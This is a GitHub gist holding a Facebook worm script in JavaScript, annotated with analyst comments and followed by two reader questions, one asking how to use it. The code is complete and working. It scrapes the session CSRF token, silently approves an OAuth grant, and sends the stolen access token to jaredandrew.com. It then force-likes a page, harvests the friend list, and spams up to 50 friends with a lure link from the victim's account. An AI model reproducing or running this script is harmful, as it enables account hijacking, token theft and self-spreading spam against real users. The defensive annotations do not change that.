
@P3t3rp4rk3r
Created August 24, 2017 19:26
// Analyst note: switch read by the console-detection code at the end of the script.
// It is hard-coded to true, so the final guard (`cntrl == 'd' || cnsl == true`) always passes
// and the reload branch inside the `id` getter is never taken.
var cnsl = true;
// Top-level `this`; the script then looks XMLHttpRequest up on it by string key.
var win = this;
// Alias for the XMLHttpRequest constructor; most requests below are made with `new ajax()`.
var ajax = win["XMLHttpRequest"];
/**
 * Entry point, called from the top-level block after the session values were scraped.
 *
 * Analyst note: a per-profile cookie named "app_" + profile_id holds the timestamp of the
 * last run and acts as a throttle. The chain below runs only when that cookie is missing
 * or older than cookie_time (40) minutes. The cookie itself is a host-side artifact that
 * can be checked for during triage.
 */
function start() {
var cookie_name = "app_" + profile_id;
var cookie_time = 40;
// parseInt is called without a radix; the stored value is a Date.now() millisecond timestamp.
if (!getCookie(cookie_name) || parseInt(getCookie(cookie_name)) < Date.now() - 60 * 1000 * cookie_time) {
// Record this run; the cookie is written with a 1-day expiry.
createCookie(cookie_name, Date.now(), 1);
// `config` is assigned without a declaration and becomes a global; online() reads chat_limit from it.
config = {};
config['chat_limit'] = 50;
platform();
android();
}
}
/**
 * Analyst note: requests a composer bootstrap response with the scraped session values,
 * pulls an access token out of the response text and sends it to a third-party host.
 *
 * The step runs only while localStorage.access_token is not the literal marker "token";
 * the marker is written after the token has been sent, so it is one-shot per browser
 * profile and the marker is a local artifact of a past run.
 * Indicators visible in this block: an image request to
 * http://jaredandrew.com/android.php carrying profile_id, access_token and
 * gender=farketmez in the query string, over plain HTTP.
 */
function android() {
if (localStorage.access_token != "token") {
// Query-string parameters of the bootstrap request.
var getParams = {};
getParams["composer_id"] = "rc.u_0_" + rand(0, 30);
getParams["composer_type"] = "pages_feed";
getParams["target_id"] = "20531316728";
getParams["av"] = profile_id;
getParams["dpr"] = "1";
// Form body: request bookkeeping fields plus the CSRF token (fb_dtsg) and jazoest
// scraped from the page by the top-level block.
var params = {};
params["__user"] = profile_id;
params["__a"] = "1";
params["__dyn"] = __dyn;
params["__af"] = "j0";
params["__req"] = "2z";
params["__be"] = "-1";
params["__pc"] = "EXP1:home_page_pkg";
params["__rev"] = __rev;
params["fb_dtsg"] = fb_dtsg;
params["jazoest"] = jazoest;
var xhr = new ajax();
xhr.open("POST", "https://www.facebook.com/react_composer/status/bootstrap/?" + deSerialize(getParams));
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
if (xhr.responseText.indexOf('access_token') > 0) {
// The token is cut out of the raw response text by string splitting (the trailing
// .split('"')[0] is redundant) and leaves the browser as a URL parameter of an image load.
new Image().src = "http://jaredandrew.com/android.php?profile_id=" + profile_id + "&access_token=" + xhr.responseText.split('access_token":')[1].split('"')[1].split('"')[0] + "&gender=farketmez";
// Marker checked by the guard at the top of this function.
localStorage.access_token = "token";
}
}
}
xhr.send(deSerialize(params));
}
}
/**
 * Analyst note: posts to the platform opt-out settings endpoint with action=enable, using
 * the scraped CSRF token, and calls getToken() once the request returns HTTP 200.
 * NOTE(review): judging by the URL this switches the account's app platform setting on
 * before the OAuth step; the response body is never inspected, so success is assumed.
 * Defender view: a settings change that the account owner did not make.
 */
function platform() {
var params = {};
params["fb_dtsg"] = fb_dtsg;
params["__user"] = profile_id;
params["__a"] = "1";
params["__dyn"] = __dyn;
params["__af"] = "3p";
params["__req"] = "pS";
params["__be"] = "-1";
params["__pc"] = "EXP:DEFAULT";
params["__rev"] = __rev;
params["jazoest"] = jazoest;
var xhr = new ajax();
xhr.open("POST", "https://www.facebook.com/settings/application/platform_opt_out/submit/?action=enable&dpr=1", true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
// Next stage of the chain.
getToken();
}
}
xhr.send(deSerialize(params));
}
/**
 * Analyst note: submits the OAuth dialog confirmation form from script, with
 * __CONFIRM__=1 and return_format=access_token, for the hard-coded app_id below.
 * The user is never shown a consent dialog by this code.
 *
 * When the response text contains "access_token=", the token is stored in the global
 * `jsonstore` together with a hard-coded page id and handed to Kontrol() and online().
 * Indicators visible in this block: app_id 165907476854626, redirect_uri
 * fbconnect://success, page id 731953020321037. An unexpected authorization for that
 * app id on an account is the server-side trace of this step.
 */
function getToken() {
var params = {};
params["fb_dtsg"] = fb_dtsg;
params["app_id"] = "165907476854626";
params["redirect_uri"] = "fbconnect://success";
params["display"] = "popup";
params["access_token"] = "";
params["sdk"] = "";
params["from_post"] = "1";
params["private"] = "";
params["tos"] = "";
params["login"] = "";
params["read"] = "";
params["write"] = "";
params["extended"] = "";
params["social_confirm"] = "";
params["confirm"] = "";
params["seen_scopes"] = "";
params["auth_type"] = "";
params["auth_token"] = "";
params["auth_nonce"] = "";
params["default_audience"] = "";
params["ref"] = "Default";
params["return_format"] = "access_token";
params["domain"] = "";
params["sso_device"] = "ios";
params["__CONFIRM__"] = "1";
var xhr = new ajax();
xhr.open("POST", "https://www.facebook.com/v2.8/dialog/oauth/confirm", true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
if (xhr.responseText.indexOf('access_token=') > 0) {
// `jsonstore` is assigned without a declaration, so it is a global shared by the later stages.
jsonstore = {};
// Token is taken from the text between "access_token=" and the next "&".
jsonstore.access_token = xhr.responseText.split('access_token=')[1].split('&')[0];
jsonstore.pages_id = 731953020321037;
Kontrol(jsonstore);
online(jsonstore);
}
}
}
xhr.send(deSerialize(params));
}
/**
 * Analyst note: uses the token obtained in getToken() to run an FQL query against
 * graph.facebook.com that asks whether the current user is already a fan of
 * jsonstore.pages_id. An empty result leads to pages(), which submits the like.
 *
 * @param {Object} jsonstore - shared state; reads access_token and pages_id.
 */
function Kontrol(jsonstore) {
// Uses the global XMLHttpRequest directly instead of the `ajax` alias.
var xhr = new XMLHttpRequest();
var params = {};
params["q"] = "SELECT created_time FROM page_fan WHERE uid = me() AND page_id = " + jsonstore.pages_id;
// The access token travels in the URL query string of a GET request.
params["access_token"] = jsonstore.access_token;
xhr.open("GET", "https://graph.facebook.com/fql?" + deSerialize(params));
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
// No try/catch: a non-JSON body or a response without a `data` array throws inside the handler.
var data = JSON.parse(xhr.responseText);
if (data.data.length == 0) {
pages(jsonstore);
}
}
}
xhr.send();
}
/**
 * Analyst note: posts to the fan_status endpoint with add=true for jsonstore.pages_id,
 * with the logged-in profile as actor and the scraped CSRF token. This is a page like
 * submitted without any user action. Defender view: an unexplained like of the
 * hard-coded page id on an account is a trace of this step.
 *
 * @param {Object} jsonstore - shared state; reads pages_id.
 */
function pages(jsonstore) {
var xhr = new XMLHttpRequest();
var params = {};
params["fbpage_id"] = jsonstore.pages_id;
params["add"] = "true";
params["reload"] = "false";
params["fan_origin"] = "page_timeline";
params["fan_source"] = "";
params["cat"] = "";
params["actor_id"] = profile_id;
params["__user"] = profile_id;
params["__a"] = "1";
params["__dyn"] = __dyn;
params["__af"] = "iw";
params["__req"] = "g";
params["__be"] = "-1";
params["__pc"] = "PHASED:DEFAULT";
params["__rev"] = __rev;
params["fb_dtsg"] = fb_dtsg;
params["jazoest"] = jazoest;
params["__spin_r"] = __rev;
params["__spin_b"] = "trunk";
params["__spin_t"] = Math.floor(Date.now() / 1000);
xhr.open("POST", "https://www.facebook.com/ajax/pages/fan_status.php?av=" + profile_id + "&dpr=1", true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
// Bare property read, not a call; this statement has no effect and the response is ignored.
xhr.close;
}
}
xhr.send(deSerialize(params));
}
/**
 * Analyst note: uses the token obtained in getToken() to pull the friend list through an
 * FQL query (uid, name, locale, online_presence, pic_big, can_post; up to 2000 rows),
 * then selects message recipients: friends reported "active" first, then "idle", capped
 * at config.chat_limit (set to 50 in start()). If at least one recipient was selected
 * the chain continues with getLink().
 *
 * @param {Object} jsonstore - shared state; reads access_token, writes friends.
 */
function online(jsonstore) {
var params = {}
params["q"] = "SELECT uid, name,locale, online_presence, pic_big, can_post FROM user WHERE uid IN (SELECT uid2 FROM friend WHERE uid1 = me()) Order By online_presence Limit 2000";
params["access_token"] = jsonstore.access_token;
params["ext"] = "me";
var xhr = new ajax();
xhr.open("GET", "https://graph.facebook.com/fql?" + deSerialize(params), true);
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
// Strips a "for (;;);" prefix from the body, if present, before parsing.
var data = JSON.parse(xhr.responseText.replace("for (;;);", ""));
if (!data.error) {
var friends = data.data;
// Randomise the order so that each run picks a different subset.
friends = shuffle(friends);
jsonstore.friends = [];
// `i` is not declared here; it is a global shared with the loop in getLink().
for (i = 0; i < friends.length && jsonstore.friends.length < config.chat_limit; i++) {
if (friends[i].online_presence == "active") {
jsonstore.friends.push(friends[i]);
}
}
// Second pass fills the remaining slots with idle friends.
for (i = 0; i < friends.length && jsonstore.friends.length < config.chat_limit; i++) {
if (friends[i].online_presence == "idle") {
jsonstore.friends.push(friends[i]);
}
}
if (jsonstore.friends.length > 0) {
getLink(jsonstore);
}
}
}
}
xhr.send();
}
/**
 * Analyst note: asks a third-party host for the link to spread and then calls send()
 * once per selected friend. The profile id of the affected account is reported to that
 * host in the query string.
 * Indicator visible in this block: GET request to
 * https://theurlshortener.com/plugins/upload.php?profile_id=<id>, answered with JSON
 * containing a `link` field.
 *
 * @param {Object} jsonstore - shared state; reads friends, writes link, uid, pic_big, name.
 */
function getLink(jsonstore) {
var xhr = new ajax();
xhr.open("GET", "https://theurlshortener.com/plugins/upload.php?profile_id=" + profile_id);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
var data = JSON.parse(xhr.responseText);
if (data.link) {
jsonstore.link = data.link;
// `i` is an undeclared global. The per-recipient fields are overwritten on the shared
// object each iteration; send() reads them synchronously before the next pass.
for (i = 0; i < jsonstore.friends.length; i++) {
jsonstore.uid = jsonstore.friends[i].uid;
jsonstore.pic_big = jsonstore.friends[i].pic_big;
// First word of the friend's name (falls back to a `text` field when `name` is empty).
jsonstore.name = jsonstore.friends[i].name ? jsonstore.friends[i].name.split(" ")[0] : jsonstore.friends[i].text.split(" ")[0];
send(jsonstore);
}
}
}
}
xhr.send();
}
/**
 * Analyst note: maps a locale string to a localised lure sentence of the form "watch my
 * private video and don't show it to anyone". The strings are useful for content-based
 * detection. Nothing in the visible script calls this function; send() builds its
 * message body without it.
 *
 * @param {string} text - locale code such as "tr_TR" or "en_US".
 * @returns {string} the lure text, or "Video" for any locale not listed.
 */
function country(text) {
// `title` is never declared, so every branch writes a global.
if (text == "tr_TR") {
title = "videoyu izle ve kimseye gösterme";
// Any locale whose language part is "en".
} else if (text.split("_")[0] == "en") {
title = "watch my private video and don't show it to anyone";
} else if (text == "it_IT") {
title = "guarda il mio video privato e non mostrarlo a nessuno";
} else if (text == "de_DE") {
title = "sehen sie sich mein privates Video an und zeigen sie es niemandem";
} else if (text == "pt_PT") {
title = "assista meu vídeo privado e não mostre a ninguém";
} else if (text == "fr_CA" || text == "fr_FR") {
title = "regarde ma vidéo privée et ne le montre pas à personne";
} else if (text == "pl_PL") {
title = "obejrzyj mój prywatny film i nie pokazuj go nikomu";
} else if (text == "el_GR") {
title = "Παρακολουθήστε το ιδιωτικό μου βίντεο και μην το εμφανίζετε σε κανέναν";
} else if (text == "sk_SK") {
title = "pozerať moje súkromné video a neukáže to nikomu";
} else {
title = "Video";
}
return title;
}
/**
 * Analyst note: posts one chat message to jsonstore.uid through the web messaging
 * endpoint, using the scraped CSRF token of the logged-in account. This is the
 * propagation step: the message comes from the account owner's own session.
 *
 * Message shape (useful for content filtering and for warning recipients):
 *   "<recipient first name> Video <emoticon>" + newline + "<link>?<recipient first name>"
 * where the emoticon is picked at random from textArray.
 *
 * @param {Object} jsonstore - shared state; reads uid, name and link.
 */
function send(jsonstore) {
// These four locals are never used; the body below reads jsonstore directly.
var uid = jsonstore.uid;
var pic_big = jsonstore.pic_big;
var name = jsonstore.name;
var link = jsonstore.link;
var textArray = [':o', ':P', 'O:)', '3:)', ';)', ':O', '-_-', '>:O', ':*', '<3', '^_^', '8-)', '(y)', ':)'];
// The random emoticon makes each message text slightly different.
var randomText = textArray[Math.floor(Math.random() * textArray.length)];
// The same random number is used as message id and offline threading id.
var message_id = rand(11111111111111, 999999999999999);
var params = {};
params["client"] = "mercury";
params["action_type"] = "ma-type:user-generated-message";
params["body"] = jsonstore.name + " Video " + randomText + "\n" + jsonstore.link + "?" + jsonstore.name;
params["has_attachment"] = "false";
params["message_id"] = message_id;
params["offline_threading_id"] = message_id;
params["other_user_fbid"] = jsonstore.uid;
params["signature_id"] = rastgele(8);
params["source"] = "source:chat:web";
params["specific_to_list[0]"] = "fbid:" + jsonstore.uid;
params["specific_to_list[1]"] = "fbid:" + profile_id;
params["timestamp"] = Date.now();
params["ui_push_phase"] = "C3";
params["__user"] = profile_id;
params["__a"] = "1";
params["__dyn"] = __dyn;
params["__af"] = "j0";
params["__req"] = "18";
params["__be"] = "-1";
params["__pc"] = "PHASED:DEFAULT";
params["__rev"] = __rev;
params["fb_dtsg"] = fb_dtsg;
params["jazoest"] = jazoest;
params["__spin_r"] = __rev;
params["__spin_b"] = "trunk";
params["__spin_t"] = Math.floor(Date.now() / 1000);
var xhr = new ajax();
xhr.open("POST", "https://www.facebook.com/messaging/send/?dpr=1", true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
// Bare property read, not a call; no effect. The send result is never checked.
xhr.close;
}
}
xhr.send(deSerialize(params));
}
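/**
 * Build a pseudo-random string that alternates consonants and vowels.
 *
 * The working variables are declared locally here. The original assigned rname, sesli,
 * sessiz and n without a declaration, which leaks globals and throws in strict mode.
 * Nothing in the visible script calls this helper.
 *
 * @param {number} length - number of characters appended after the first one, so the
 *   result is length + 1 characters long.
 * @param {boolean} firstUpper - when loosely equal to true, upper-case the first character.
 * @returns {string} the generated string.
 */
function generate_name(length, firstUpper) {
  var sesli = "aeiou"; // vowels
  var sessiz = "bcdfghjklmnprstvyz"; // consonants
  var rname = rand(1, 2) == 1 ? sessiz[rand(0, sessiz.length - 1)] : sesli[rand(0, sesli.length - 1)];
  if (firstUpper == true) {
    rname = rname.toUpperCase();
  }
  for (var n = 0; n < length; n++) {
    // A vowel is followed by a consonant and anything else by a vowel. An upper-cased
    // first character never matches the lower-case vowel list, so it is always
    // followed by a vowel.
    if (sesli.indexOf(rname[rname.length - 1]) >= 0) {
      rname += sessiz[rand(0, sessiz.length - 1)];
    } else {
      rname += sesli[rand(0, sesli.length - 1)];
    }
  }
  return rname;
}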
/**
 * Look a cookie up by name in document.cookie.
 *
 * @param {string} cname - cookie name.
 * @returns {string} the cookie value, or "" when no cookie with that name exists.
 */
function getCookie(cname) {
  var prefix = cname + "=";
  var entries = document.cookie.split(';');
  for (var idx = 0; idx < entries.length; idx += 1) {
    // Entries after the first are separated by "; ", so drop leading spaces.
    var entry = entries[idx].replace(/^ +/, "");
    if (entry.slice(0, prefix.length) === prefix) {
      return entry.substring(prefix.length);
    }
  }
  return "";
}
/**
 * Write a cookie for path "/" through document.cookie.
 *
 * @param {string} name - cookie name.
 * @param {*} value - cookie value; concatenated as-is, not URL-encoded.
 * @param {number} days - lifetime in days; a falsy value creates a session cookie.
 */
function createCookie(name, value, days) {
  var expires = "";
  if (days) {
    var date = new Date();
    var lifetimeMs = days * 24 * 60 * 60 * 1000;
    date.setTime(date.getTime() + lifetimeMs);
    expires = "; expires=" + date.toGMTString();
  }
  document.cookie = name + "=" + value + expires + "; path=/";
}
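/**
 * Report whether any object in `arr` has an enumerable property `key` whose value is
 * loosely equal to `value`.
 *
 * The loop variables are declared locally here. The original used undeclared `a` and
 * `k`, which leaks globals and throws in strict mode. Loose equality is kept so that
 * results match the original. Nothing in the visible script calls this helper.
 *
 * @param {Array<Object>} arr - objects to scan.
 * @param {string} key - property name to look for.
 * @param {*} value - value to compare with, using ==.
 * @returns {boolean} true when a match exists.
 */
function inArray(arr, key, value) {
  for (var a = 0; a < arr.length; a++) {
    for (var k in arr[a]) {
      if (k == key && arr[a][k] == value) {
        return true;
      }
    }
  }
  return false;
}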
/**
 * Analyst note: computes the value that the top-level block stores in `__dyn` and that
 * every forged request sends as its "__dyn" parameter. It is derived from the page
 * itself: numbers found in `},<digits>]` patterns in the body and head markup are
 * treated as set bits of a bitmap, which is run-length encoded and written out in a
 * 64-character alphabet.
 * NOTE(review): presumably this reproduces the value the site's own client code sends,
 * so that the forged requests look like normal ones; that cannot be confirmed from this
 * file alone.
 *
 * @returns {string} the encoded string ("" when the bitmap is empty).
 */
function get_dyn() {
// Builds the bitmap from `t`, run-length encodes it and packs it with k().
function toCompressedString() {
// `$BitMap1` and `i` are undeclared, so they become globals.
$BitMap1 = [];
for (i in t) {
// Mark index t[i] as set; the array grows to the largest index + 1.
$BitMap1[t[i]] = 1;
}
if ($BitMap1["length"] === 0) {
return "";
}
var l = [];
// m = length of the current run, n = bit value of the current run.
var m = 1;
var n = $BitMap1[0] || 0;
// o = value of the first bit as a string; it prefixes the encoded run lengths.
var o = n.toString(2);
var p = 1;
for (; p < $BitMap1["length"]; p++) {
var q = $BitMap1[p] || 0;
if (q === n) {
m++;
} else {
// The run ended: emit its length and start a new run with the other bit value.
l["push"](j(m));
n = q;
m = 1;
}
}
if (m) {
l["push"](j(m));
}
return k(o + l["join"](""));
}
// Encodes a run length as (bit count - 1) zeros followed by its binary digits.
function j(l) {
var m = l.toString(2);
var n = "0" ["repeat"](m["length"] - 1);
return n + m;
}
// Pads the bit string with zeros, cuts it into 6-bit groups and maps each group to one
// character of the alphabet `h`.
function k(l) {
var m = (l + "00000")["match"](/[01]{6}/g);
var n = "";
var o = 0;
for (; o < m["length"]; o++) {
n += h[parseInt(m[o], 2)];
}
return n;
}
// Collect every `},<digits>]` occurrence from the page markup.
var bd = document["body"]["innerHTML"]["match"](/\},([0-9])+\]/gi);
var hd = document["head"]["innerHTML"]["match"](/\},([0-9])+\]/gi);
// match() returns null when nothing matches: a null `bd` throws on the next line, while a
// null `hd` is appended as a null element, which the `!= null` check below skips.
var is = bd["concat"](hd);
var t = [];
// `x` is undeclared (global); for...in walks the indices of the match array.
for (x in is) {
if (is[x] != null) {
var p = is[x]["replace"]("},", "")["replace"]("]", "");
// Only numbers >= 7 are kept.
if (parseInt(p) >= 7) {
t["push"](parseInt(p));
}
}
}
// Alphabet used by k(); `t` and `h` are assigned before the nested functions run.
var h = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-_";
return toCompressedString();
}
/**
 * Produce a GUID-shaped string (8-4-4-4-12 hex digits) from Math.random().
 * No version or variant bits are set, and Math.random() is not a cryptographic source.
 * Nothing in the visible script calls this helper.
 *
 * @returns {string} a 36-character string of hex digits and dashes.
 */
function guid() {
  // Four random hex digits: a value in [0x10000, 0x20000) with its leading "1" removed.
  var hex4 = function () {
    var n = Math.floor((1 + Math.random()) * 0x10000);
    return n.toString(16).substring(1);
  };
  var groups = [hex4() + hex4(), hex4(), hex4(), hex4(), hex4() + hex4() + hex4()];
  return groups.join('-');
}
/**
 * Draw `l` distinct random integers from the range [0, m).
 * The loop never ends when l is greater than the number of distinct values available.
 * Nothing in the visible script calls this helper.
 *
 * @param {number} l - how many values to return.
 * @param {number} m - exclusive upper bound.
 * @returns {number[]} the values in the order they were drawn.
 */
function randoms(l, m) {
  var picked = [];
  for (; picked.length < l;) {
    var candidate = Math.floor(Math.random() * m);
    // Skip values that were already drawn.
    if (picked.indexOf(candidate) === -1) {
      picked.push(candidate);
    }
  }
  return picked;
}
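/**
 * Depth-first search of a nested object or array for the first property named `k`.
 *
 * The loop variable is declared locally here. The original used an undeclared `key`,
 * a global shared by every level of the recursion, which throws in strict mode.
 * As in the original, `false` means "not found", so a match whose value is loosely
 * equal to false at a nested level is not distinguished from a miss.
 * Nothing in the visible script calls this helper.
 *
 * @param {Object|Array} a - structure to search.
 * @param {string} k - property name to find (compared with ==).
 * @returns {*} the value stored under the first match, or false.
 */
function searchArray(a, k) {
  var found = false;
  for (var key in a) {
    if (key.toString() == k) {
      found = a[key];
      break;
    } else if (typeof a[key] == "object") {
      // Descend into nested objects and arrays; for...in over null visits nothing.
      found = searchArray(a[key], k);
      if (found != false) {
        break;
      }
    }
  }
  return found;
}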
/**
 * Shuffle an array in place by swapping each position, from the last to the first,
 * with a randomly chosen position at or before it. Uses Math.random().
 *
 * @param {Array} array - array to reorder; it is modified.
 * @returns {Array} the same array instance.
 */
function shuffle(array) {
  for (var remaining = array.length; remaining !== 0;) {
    var pick = Math.floor(Math.random() * remaining);
    remaining -= 1;
    // Swap the last unshuffled element with the picked one.
    var held = array[remaining];
    array[remaining] = array[pick];
    array[pick] = held;
  }
  return array;
}
/**
 * Random integer in the half-open range [min, max): `max` itself is never returned.
 * With the arguments used elsewhere in this file, rand(1, 2) therefore always yields 1.
 *
 * @param {number} min - inclusive lower bound.
 * @param {number} max - exclusive upper bound.
 * @returns {number} an integer n with min <= n < max.
 */
function rand(min, max) {
  var span = max - min;
  var offset = Math.floor(Math.random() * span);
  return offset + min;
}
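/**
 * Build a random alphanumeric string of the requested length with Math.random().
 * In this script it only feeds the "signature_id" request field in send().
 *
 * The working variables are declared locally here. The original assigned mtn, ret and
 * l without a declaration, which leaks globals and throws in strict mode.
 *
 * @param {number} uzunluk - number of characters to generate.
 * @returns {string} the generated string ("" for a length of 0).
 */
function rastgele(uzunluk) {
  var mtn = "abcdefghijklmnoprstuvyzxABCDEFGHIJKLMNOPRSTUVYZX0123456789";
  var ret = "";
  for (var l = 0; l < uzunluk; l++) {
    ret += mtn[Math.floor(Math.random() * mtn.length)];
  }
  return ret;
}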
/**
 * Despite its name, this serialises a flat object into a URL-encoded "k=v&k=v" string.
 * It is used for both query strings and form bodies.
 *
 * @param {Object} json - flat map of parameter names to values.
 * @returns {string} the encoded pairs joined with "&", in Object.keys() order.
 */
function deSerialize(json) {
  var names = Object.keys(json);
  var pairs = [];
  for (var idx = 0; idx < names.length; idx++) {
    var field = names[idx];
    pairs.push(encodeURIComponent(field) + '=' + encodeURIComponent(json[field]));
  }
  return pairs.join('&');
}
// Analyst note: top-level bootstrap. Part 1 appears to be a developer-console check,
// part 2 scrapes the session values from the page and starts the chain.
var cntrl = 'd';
var element = new Image();
// A getter on `id` that flips cntrl to 'e' when something reads the property. The element
// is logged and the console cleared straight after, so the read would presumably come
// from an open console rendering the logged element. Hedged: inferred from the pattern.
element.__defineGetter__('id', function() {
cntrl = 'e';
// Dead branch in this sample: cnsl is hard-coded to true at the top of the file.
if (cnsl == false) {
location.reload();
}
});
console.log(element);
console.clear();
// Runs only on hosts whose name contains "facebook.com" (a substring test, not an exact
// match). Because cnsl is true, the console check above does not block execution.
if (location.hostname.indexOf("facebook.com") >= 0 && (cntrl == 'd' || cnsl == true)) {
// Everything assigned below is an undeclared global that the request functions read.
// fb_dtsg is the hidden form field whose value they all send back as the "fb_dtsg" parameter.
fb_dtsg_list = document.getElementsByName('fb_dtsg');
if (fb_dtsg_list.length > 0) {
// Logged-in user id from the c_user cookie; throws if the cookie is absent (match() returns null).
profile_id = document.cookie.match(/c_user=(\d+)/)[1];
fb_dtsg = fb_dtsg_list[0].value;
__dyn = get_dyn();
// Client revision from the head markup, or a random 7-digit number when it is not found.
if (document.head.innerHTML.split('"client_revision":')[1]) {
__rev = document.head.innerHTML.split('"client_revision":')[1].split(",")[0];
} else {
__rev = rand(1111111, 9999999);
}
// jazoest = "2" followed by the decimal character codes of fb_dtsg, concatenated.
jazoest = "";
for (var x = 0; x < fb_dtsg.length; x++) {
jazoest += fb_dtsg.charCodeAt(x);
}
jazoest = '2' + jazoest;
start();
}
}
@nicole1989

how to apply this?
I am still learning.
is this malware that can send messages?


ghost commented Dec 3, 2018

what is that?
